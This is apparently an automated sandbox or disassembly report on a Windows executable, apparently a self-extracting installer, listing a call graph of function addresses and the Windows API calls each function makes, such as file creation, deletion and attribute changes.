14208 403d5a 14207->14208 14209 403d75 14208->14209 14211 4014bc 2 API calls 14208->14211 14212 4039e7 88 API calls 14209->14212 14210->14213 14214 403d6b 14211->14214 14215 403d7d 14212->14215 14213->14207 14216 401795 2 API calls 14214->14216 14217 403e48 7 API calls 14215->14217 14218 4014bc 2 API calls 14215->14218 14216->14209 14217->14191 14219 403d92 14218->14219 14220 402ab8 2 API calls 14219->14220 14221 403d9f CoCreateInstance 14220->14221 14221->14217 14222 403dc1 14221->14222 14222->14217 14225 40334d 14223->14225 14224 403392 14224->14189 14224->14190 14225->14224 14226 401795 2 API calls 14225->14226 14226->14225 14227 41872c 14228 418748 14227->14228 14230 418737 14227->14230 14230->14228 14231 413880 14230->14231 14236 4075cb ResetEvent 14231->14236 14234 4075cb 2 API calls 14235 413899 14234->14235 14235->14230 14237 40751b GetLastError 14236->14237 14238 4075dd 14237->14238 14238->14234 10344 4120c0 10345 4120ce 10344->10345 10350 4120d8 10344->10350 10365 402a2f 10345->10365 10349 4120e2 10350->10349 10351 411f90 10350->10351 10358 413b69 10350->10358 10353 411fb6 10351->10353 10357 411fa0 10351->10357 10352 411fdb 10352->10350 10353->10352 10370 411000 10353->10370 10355 411fae 10355->10350 10357->10355 10373 411a40 10357->10373 10359 413ba9 10358->10359 10360 413b75 10358->10360 10359->10350 10360->10359 10385 415588 10360->10385 10391 41247f SetFileTime 10360->10391 10392 41229a 10360->10392 10395 4012ab 10360->10395 10744 4029c5 10365->10744 10368 402a3d 10368->10350 10369 402a3e VirtualAlloc 10369->10350 10378 410e70 memset 10370->10378 10375 411a5d 10373->10375 10374 411a7d 10374->10357 10375->10374 10380 4111d0 10375->10380 10377 411dfa 10377->10357 10379 410ecc 10378->10379 10379->10357 10381 4111f3 10380->10381 10382 410e70 memset 10381->10382 10383 411286 10381->10383 10384 41127e 10382->10384 10383->10377 10384->10377 10389 415594 10385->10389 10386 415641 10386->10360 10387 415549 106 API calls 10387->10389 10389->10386 10389->10387 10401 418eab 10389->10401 10405 415428 10389->10405 10391->10360 10393 4122a4 CloseHandle 10392->10393 10394 4122af 10392->10394 10393->10394 10394->10360 10396 4012bf 10395->10396 10399 4012b3 10395->10399 10397 4012dc 10396->10397 10740 41249c 10396->10740 10397->10399 10400 4012e9 SetFileAttributesW 10397->10400 10399->10360 10400->10399 10402 418ebc 10401->10402 10403 418ecc 10401->10403 10410 412ace 10402->10410 10403->10389 10406 415442 10405->10406 10422 412434 10406->10422 10425 401b0b 10406->10425 10407 415476 10407->10389 10415 4124ac 10410->10415 10412 412ae7 10418 4129fa 10412->10418 10414 412b06 10414->10403 10416 4124ba 10415->10416 10417 4124bd WriteFile 10415->10417 10416->10417 10417->10412 10419 412a01 10418->10419 10420 412a04 GetLastError 10418->10420 10419->10414 10421 412a0e 10420->10421 10421->10414 10486 41236b 10422->10486 10426 401b27 10425->10426 10431 401b1d 10425->10431 10427 401b54 10426->10427 10491 4014eb 10426->10491 10516 412574 10427->10516 10431->10407 10432 401e47 ??3@YAXPAX 10436 412574 VariantClear 10432->10436 10433 401b82 10494 401403 10433->10494 10436->10431 10437 401b8d 10498 4017c0 10437->10498 10441 401bac ??3@YAXPAX 10442 401e0d ??3@YAXPAX 10441->10442 10448 401bbe 10441->10448 10444 412574 VariantClear 10442->10444 10444->10431 10445 401bdf 10446 412574 VariantClear 10445->10446 10447 401be7 ??3@YAXPAX 10446->10447 10447->10427 10448->10445 10449 401c49 10448->10449 10450 401c0a 10448->10450 10453 401c87 10449->10453 10454 401c6e 10449->10454 10451 412574 VariantClear 10450->10451 10452 401c1c ??3@YAXPAX 10451->10452 10452->10427 10456 401ca9 GetLocalTime SystemTimeToFileTime 10453->10456 10457 401c8f 10453->10457 10455 412574 VariantClear 10454->10455 10458 401c76 ??3@YAXPAX 10455->10458 10456->10457 10457->10450 10459 401cc6 10457->10459 10460 401cdd 10457->10460 10458->10427 10520 4039e7 lstrlenW 10459->10520 10507 40367d GetFileAttributesW 10460->10507 10464 401e19 GetLastError 10464->10442 10465 401cfd ??2@YAPAXI 10467 401d09 10465->10467 10466 401e0f 10466->10464 10544 412468 10467->10544 10470 401df4 10473 412574 VariantClear 10470->10473 10471 401d44 GetLastError 10547 4013d1 10471->10547 10473->10442 10474 401d56 10475 4039e7 88 API calls 10474->10475 10478 401d64 ??3@YAXPAX 10474->10478 10476 401db1 10475->10476 10476->10478 10480 412468 2 API calls 10476->10480 10479 401d81 10478->10479 10481 412574 VariantClear 10479->10481 10483 401dd6 10480->10483 10482 401d8f ??3@YAXPAX 10481->10482 10482->10427 10484 401dda GetLastError 10483->10484 10485 401deb ??3@YAXPAX 10483->10485 10484->10478 10485->10470 10487 41229a CloseHandle 10486->10487 10488 412376 10487->10488 10489 41237a CreateFileW 10488->10489 10490 41239f 10488->10490 10489->10490 10490->10407 10550 4011b7 10491->10550 10495 40141a 10494->10495 10496 4011b7 2 API calls 10495->10496 10497 401425 10496->10497 10497->10437 10499 4013d1 2 API calls 10498->10499 10500 4017ce 10499->10500 10555 4014bc 10500->10555 10502 4017d9 10503 40143c 10502->10503 10504 401448 10503->10504 10506 40145a 10503->10506 10505 4011b7 2 API calls 10504->10505 10505->10506 10506->10441 10508 401ce9 10507->10508 10509 40369a 10507->10509 10508->10464 10508->10465 10508->10466 10510 4036ab 10509->10510 10511 40369e SetLastError 10509->10511 10510->10508 10512 4036b4 10510->10512 10514 4036c2 FindFirstFileW 10510->10514 10511->10508 10562 403650 10512->10562 10514->10512 10515 4036d5 FindClose CompareFileTime 10514->10515 10515->10508 10515->10512 10517 412530 10516->10517 10518 412568 10517->10518 10519 412551 VariantClear 10517->10519 10518->10431 10519->10431 10521 402a67 2 API calls 10520->10521 10522 403a08 10521->10522 10523 4011b7 2 API calls 10522->10523 10531 403a18 10522->10531 10523->10531 10525 403a66 GetSystemTimeAsFileTime GetFileAttributesW 10526 403a85 10525->10526 10527 403a7b 10525->10527 10530 401e6b 4 API calls 10526->10530 10534 403a8b ??3@YAXPAX 10526->10534 10529 40367d 22 API calls 10527->10529 10528 403b0a 10532 403b3a 10528->10532 10528->10534 10529->10526 10542 403a98 10530->10542 10531->10525 10531->10528 10611 401e6b CreateDirectoryW 10531->10611 10533 409606 57 API calls 10532->10533 10538 403b44 ??3@YAXPAX 10533->10538 10541 403b4f 10534->10541 10535 403a9d 10617 409606 10535->10617 10536 403ab0 memcpy 10536->10542 10537 403afe ??3@YAXPAX 10537->10541 10538->10541 10541->10450 10542->10535 10542->10536 10542->10537 10543 401e6b 4 API calls 10542->10543 10543->10542 10737 412451 10544->10737 10548 4011b7 2 API calls 10547->10548 10549 4013eb 10548->10549 10549->10474 10551 401203 10550->10551 10552 4011c5 ??2@YAPAXI 10550->10552 10551->10432 10551->10433 10552->10551 10553 4011e6 ??3@YAXPAX 10552->10553 10553->10551 10558 401472 10555->10558 10557 4014cc 10557->10502 10559 4014b6 10558->10559 10560 401486 10558->10560 10559->10557 10561 4011b7 2 API calls 10560->10561 10561->10559 10568 4032e9 10562->10568 10564 403659 10565 40367a 10564->10565 10566 40365e GetLastError 10564->10566 10565->10508 10567 403669 10566->10567 10567->10508 10569 4032f2 10568->10569 10570 4032f6 GetFileAttributesW 10568->10570 10569->10564 10571 403307 10570->10571 10572 40330c 10570->10572 10571->10564 10573 403310 SetFileAttributesW 10572->10573 10574 40332a 10572->10574 10576 403326 10573->10576 10577 40331d DeleteFileW 10573->10577 10579 4031dc 10574->10579 10576->10564 10577->10564 10600 402a67 10579->10600 10581 4031f3 10604 402ab8 10581->10604 10583 403200 FindFirstFileW 10584 4032b8 SetFileAttributesW 10583->10584 10598 403222 10583->10598 10586 4032c3 RemoveDirectoryW 10584->10586 10587 4032db ??3@YAXPAX 10584->10587 10585 401403 2 API calls 10585->10598 10586->10587 10588 4032d0 ??3@YAXPAX 10586->10588 10589 4032e3 10587->10589 10588->10589 10589->10564 10591 402ab8 2 API calls 10591->10598 10592 403252 lstrcmpW 10595 403268 lstrcmpW 10592->10595 10596 40329b FindNextFileW 10592->10596 10593 403287 SetFileAttributesW 10593->10587 10594 403290 DeleteFileW 10593->10594 10594->10598 10595->10596 10595->10598 10597 4032b1 FindClose 10596->10597 10596->10598 10597->10584 10598->10585 10598->10587 10598->10591 10598->10592 10598->10593 10598->10596 10599 4031dc 2 API calls 10598->10599 10608 401795 10598->10608 10599->10598 10601 402a7e 10600->10601 10602 4011b7 2 API calls 10601->10602 10603 402a89 10602->10603 10603->10581 10605 402ac5 10604->10605 10606 401472 2 API calls 10605->10606 10607 402ad0 10606->10607 10607->10583 10609 401472 2 API calls 10608->10609 10610 40179f 10609->10610 10610->10598 10612 401eac 10611->10612 10613 401e7c GetLastError 10611->10613 10612->10531 10614 401e96 GetFileAttributesW 10613->10614 10616 401e8b 10613->10616 10614->10612 10614->10616 10615 401e8c SetLastError 10615->10531 10616->10612 10616->10615 10628 40247d 10617->10628 10620 4096e9 10624 409522 27 API calls 10620->10624 10621 40963b GetLastError FormatMessageW 10622 409669 FormatMessageW 10621->10622 10623 40967e lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 10621->10623 10622->10620 10622->10623 10648 409522 10623->10648 10626 4096f5 10624->10626 10626->10534 10629 402494 10628->10629 10630 4024c5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 10629->10630 10631 4024bb wvsprintfW 10629->10631 10632 402575 SetLastError 10630->10632 10633 4024fd ??2@YAPAXI GetEnvironmentVariableW 10630->10633 10631->10620 10631->10621 10632->10631 10637 40258c 10632->10637 10634 40252c GetLastError 10633->10634 10647 40255e ??3@YAXPAX 10633->10647 10638 402532 10634->10638 10634->10647 10636 4025ab lstrlenA ??2@YAPAXI 10641 402616 MultiByteToWideChar 10636->10641 10642 4025dc GetLocaleInfoW 10636->10642 10637->10636 10658 402427 10637->10658 10639 402561 10638->10639 10643 40253c lstrcmpiW 10638->10643 10639->10632 10641->10631 10642->10641 10645 402603 _wtol 10642->10645 10646 40254b ??3@YAXPAX 10643->10646 10643->10647 10644 4025a1 10644->10636 10645->10641 10646->10639 10647->10639 10649 409531 10648->10649 10650 409597 ??3@YAXPAX LocalFree 10648->10650 10665 4083ea 10649->10665 10650->10626 10653 409569 10670 40844b 10653->10670 10654 409557 IsBadReadPtr 10654->10653 10659 402431 GetUserDefaultUILanguage 10658->10659 10660 402475 10658->10660 10661 402452 GetSystemDefaultUILanguage 10659->10661 10662 40244e 10659->10662 10660->10644 10661->10660 10663 40245e GetSystemDefaultLCID 10661->10663 10662->10644 10663->10660 10664 40246e 10663->10664 10664->10660 10666 4014eb 2 API calls 10665->10666 10667 4083fb 10666->10667 10668 408447 IsWindow 10667->10668 10669 408423 GetSystemMetrics GetSystemMetrics 10667->10669 10668->10653 10668->10654 10669->10668 10671 40845a 10670->10671 10672 4084be 10670->10672 10671->10672 10673 402a67 2 API calls 10671->10673 10682 4081be ??3@YAXPAX 10672->10682 10674 40846b 10673->10674 10675 402a67 2 API calls 10674->10675 10676 408476 10675->10676 10683 4044e2 10676->10683 10679 4044e2 20 API calls 10680 408488 ??3@YAXPAX ??3@YAXPAX 10679->10680 10680->10672 10682->10650 10690 402e67 10683->10690 10687 4044fa 10726 4044ae 10687->10726 10691 4014eb ??2@YAPAXI ??3@YAXPAX 10690->10691 10692 402e75 10691->10692 10693 402e85 ExpandEnvironmentStringsW 10692->10693 10694 4011b7 ??2@YAPAXI ??3@YAXPAX 10692->10694 10695 402ea9 10693->10695 10696 402e9e ??3@YAXPAX 10693->10696 10694->10693 10697 402aa0 ??2@YAPAXI ??3@YAXPAX 10695->10697 10698 402ee0 10696->10698 10699 402eb7 ExpandEnvironmentStringsW 10697->10699 10703 4041b2 10698->10703 10700 402ec4 10699->10700 10701 40143c ??2@YAPAXI ??3@YAXPAX 10700->10701 10702 402ed8 ??3@YAXPAX 10701->10702 10702->10698 10704 4014eb ??2@YAPAXI ??3@YAXPAX 10703->10704 10705 4041c0 10704->10705 10706 40143c ??2@YAPAXI ??3@YAXPAX 10705->10706 10707 4041cb 10706->10707 10708 402ab8 ??2@YAPAXI ??3@YAXPAX 10707->10708 10709 4041d8 10708->10709 10710 402a67 ??2@YAPAXI ??3@YAXPAX 10709->10710 10711 4041e5 10710->10711 10712 404137 ??2@YAPAXI ??3@YAXPAX memmove 10711->10712 10713 4041f5 ??3@YAXPAX 10712->10713 10714 40143c ??2@YAPAXI ??3@YAXPAX 10713->10714 10715 404209 10714->10715 10716 402ab8 ??2@YAPAXI ??3@YAXPAX 10715->10716 10717 404216 10716->10717 10718 402a67 ??2@YAPAXI ??3@YAXPAX 10717->10718 10719 404223 10718->10719 10720 404137 ??2@YAPAXI ??3@YAXPAX memmove 10719->10720 10721 404233 ??3@YAXPAX 10720->10721 10722 402a67 ??2@YAPAXI ??3@YAXPAX 10721->10722 10723 40424a 10722->10723 10724 404137 ??2@YAPAXI ??3@YAXPAX memmove 10723->10724 10725 404259 ??3@YAXPAX ??3@YAXPAX 10724->10725 10725->10687 10727 402e67 6 API calls 10726->10727 10728 4044b9 10727->10728 10729 40426d 7 API calls 10728->10729 10730 4044c6 10729->10730 10731 404328 7 API calls 10730->10731 10732 4044d1 10731->10732 10733 4043e3 ??2@YAPAXI ??3@YAXPAX memmove ??3@YAXPAX 10732->10733 10734 4044d7 10733->10734 10735 402e67 6 API calls 10734->10735 10736 4044dd 10735->10736 10736->10679 10738 412434 2 API calls 10737->10738 10739 401d3c 10738->10739 10739->10470 10739->10471 10743 41247f SetFileTime 10740->10743 10742 4124a9 10742->10397 10743->10742 10745 4029d5 10744->10745 10751 4029d1 10744->10751 10746 4029e5 GlobalMemoryStatusEx 10745->10746 10745->10751 10747 4029f3 10746->10747 10746->10751 10748 40247d 19 API calls 10747->10748 10747->10751 10749 402a0d 10748->10749 10752 409599 10749->10752 10751->10368 10751->10369 10753 4083ea 4 API calls 10752->10753 10754 4095a7 IsWindow 10753->10754 10755 4095d0 10754->10755 10756 4095be IsBadReadPtr 10754->10756 10757 40844b 22 API calls 10755->10757 10756->10755 10758 4095f7 10757->10758 10761 4081be ??3@YAXPAX 10758->10761 10760 409601 10760->10751 10761->10760 12687 414dcf _EH_prolog 12698 414e02 12687->12698 12688 414f2f 12718 40122a 12688->12718 12690 414f44 12732 414b2d 12690->12732 12691 414f59 12694 414f66 ??2@YAPAXI 12691->12694 12692 414be8 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 12692->12698 12709 414f80 12694->12709 12695 414da5 7 API calls 12695->12698 12696 414b0b 4 API calls 12696->12698 12697 412885 VirtualFree ??3@YAXPAX ??3@YAXPAX ctype 12697->12698 12698->12688 12698->12692 12698->12695 12698->12696 12698->12697 12699 414cbf _CxxThrowException 12698->12699 12708 414e24 12698->12708 12699->12698 12700 414fca 12702 414c38 2 API calls 12700->12702 12701 41502d ??2@YAPAXI 12701->12709 12705 414fe2 12702->12705 12703 414c38 2 API calls 12703->12709 12706 414b2d ctype 2 API calls 12705->12706 12706->12708 12707 414b2d ctype 2 API calls 12707->12709 12709->12700 12709->12701 12709->12703 12709->12707 12709->12708 12714 414491 151 API calls 12709->12714 12715 4150aa 12709->12715 12728 4156e6 12709->12728 12735 415346 ??2@YAPAXI 12709->12735 12737 415693 12709->12737 12711 414c38 2 API calls 12712 4150cf 12711->12712 12713 414b2d ctype 2 API calls 12712->12713 12713->12708 12714->12709 12715->12711 12719 401238 GetDiskFreeSpaceExW 12718->12719 12720 40128e SendMessageW 12718->12720 12719->12720 12721 401250 12719->12721 12726 401276 12720->12726 12721->12720 12722 40247d 19 API calls 12721->12722 12723 401269 12722->12723 12724 409599 27 API calls 12723->12724 12725 40126f 12724->12725 12725->12726 12727 401287 12725->12727 12726->12690 12726->12691 12727->12720 12729 41570f 12728->12729 12741 415549 12729->12741 12733 4127e6 ctype 2 API calls 12732->12733 12734 414b3b 12733->12734 12736 415378 12735->12736 12736->12709 12739 415698 12737->12739 12738 4156bf 12738->12709 12739->12738 12740 415428 106 API calls 12739->12740 12740->12739 12744 41554e 12741->12744 12742 415584 12742->12709 12743 415428 106 API calls 12743->12744 12744->12742 12744->12743 12745 4017de 12746 4017fb 12745->12746 12747 4017eb 12745->12747 12750 40175a ??3@YAXPAX 12747->12750 12751 401773 ??3@YAXPAX 12750->12751 12752 40176d 12750->12752 12753 401783 ??3@YAXPAX 12751->12753 12752->12751 12753->12746 10341 4123f1 ReadFile 13790 419c90 13795 407613 InitializeCriticalSection 13790->13795 13792 419c9a 13793 4192a8 2 API calls 13792->13793 13794 419ca4 13793->13794 13795->13792 10762 401198 SysAllocString 14771 404ba6 14775 404bbb 14771->14775 14772 404be9 14773 412833 memmove 14772->14773 14774 404bf7 14773->14774 14775->14772 14778 402990 ??3@YAXPAX ??3@YAXPAX 14775->14778 14777 404bda ??3@YAXPAX 14777->14775 14778->14777 14821 4015ac 14822 401556 6 API calls 14821->14822 14823 4015b9 14822->14823 14825 4015bd 14823->14825 14826 401198 SysAllocString 14823->14826 14826->14825
                                                                APIs
                                                                • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405C0F
                                                                  • Part of subcall function 00402017: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                  • Part of subcall function 00402017: CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                  • Part of subcall function 00402017: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                  • Part of subcall function 00402017: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                  • Part of subcall function 00402017: DispatchMessageW.USER32(?), ref: 00402069
                                                                  • Part of subcall function 00402017: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                  • Part of subcall function 00402017: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405C2C
                                                                • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 00405CBB
                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                  • Part of subcall function 004030CC: ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                • lstrlenW.KERNEL32(?,00000000,00000000), ref: 00405CE6
                                                                  • Part of subcall function 00404D0B: #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                  • Part of subcall function 00404D0B: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                  • Part of subcall function 00404D0B: wsprintfW.USER32 ref: 00404DB8
                                                                • wsprintfW.USER32 ref: 00405D45
                                                                • _wtol.MSVCRT ref: 00405D7F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DCE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 00405DE2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,0041EA30), ref: 00405DEA
                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                • GetModuleFileNameW.KERNEL32(00000000,00000208), ref: 00405E61
                                                                • _wtol.MSVCRT ref: 00405F89
                                                                • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,0041EA30,0041EA30), ref: 00406118
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,0041EA30,0041EA30), ref: 0040619B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041EA30,0041EA30), ref: 00406211
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041EA30,0041EA30), ref: 0040622D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0041EA30,0041EA30), ref: 0040626B
                                                                • wsprintfW.USER32 ref: 00406295
                                                                • _wtol.MSVCRT ref: 004064B6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00406587
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004065D4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 004065DC
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 004065FB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406653
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 0040665B
                                                                • GetCommandLineW.KERNEL32(?,00000000,?,?), ref: 004066C3
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040673B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00406743
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040674B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00406753
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040675B
                                                                • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
                                                                • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040678A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00406792
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040679A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067A2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004067BE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004067C6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067CE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067D6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,00000000,?,?), ref: 0040687F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00000000,?,?), ref: 004068A4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?), ref: 00406916
                                                                • CoInitialize.OLE32(00000000), ref: 00406937
                                                                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
                                                                • _wtol.MSVCRT ref: 00406A68
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406A8B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406AC4
                                                                • GetKeyState.USER32(00000010), ref: 00406B1B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406C59
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406C67
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C92
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C9A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406CB6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406CBE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00406CEE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D2E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D97
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0041E9E8), ref: 00406D9F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E64
                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E6F
                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F33
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F3B
                                                                • _wtol.MSVCRT ref: 00406FCF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 004071AE
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,?,?,?,?), ref: 004071B6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004071DA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407223
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040722B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407233
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407239
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407249
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407251
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040726E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407276
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040727E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407286
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040728E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041E9E8), ref: 004072AF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041E9E8), ref: 004072B7
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004072C3
                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 004072E4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 004072EC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 004072F4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 004072FA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00407302
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 0040730A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00407312
